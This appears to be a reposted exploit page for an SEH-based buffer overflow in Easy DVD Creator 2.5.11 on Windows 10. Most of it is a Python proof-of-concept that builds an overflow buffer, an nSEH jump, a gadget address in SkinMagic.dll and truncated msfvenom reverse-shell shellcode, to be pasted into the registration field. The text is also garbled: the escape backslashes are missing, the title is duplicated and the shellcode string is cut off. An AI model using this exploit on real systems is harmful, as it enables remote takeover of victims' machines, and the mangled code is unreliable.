# Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, #!/usr/bin/python
# Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)
# Date: 26-08-2017
# Exploit Author: tr0ubl3m4k3r
# Vulnerable Software: Easy DVD Creator
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 2.5.11
# Software Link: http://www.divxtodvd.net/easy_dvd_creator.exe
# Tested On: Windows 10 64bit
# Credit to Muhann4d for discovering the PoC (41911).
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of exploit.txt
buffer = "x41" * 988
nSEH = "xebx09x90x90"
# 0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:Program Files (x86)Easy MOV ConverterSkinMagic.dll)
SEH = "x59x78x03x10"
junk = "x90"*16
# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443
# -f c -e x86/shikata_ga_nai -b "x00x0ax0d"
shellcode = ("xdbxd5xbfxd7xf8x35x95xd9x74x24xf4x5ax2bxc9xb1"
padding = "x44"*(1000-351)
f = open ("exploit.txt", "w")
f.write(buffer + nSEH + SEH + junk + shellcode + padding)
Easy DVD Creator 2.5.11 Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 725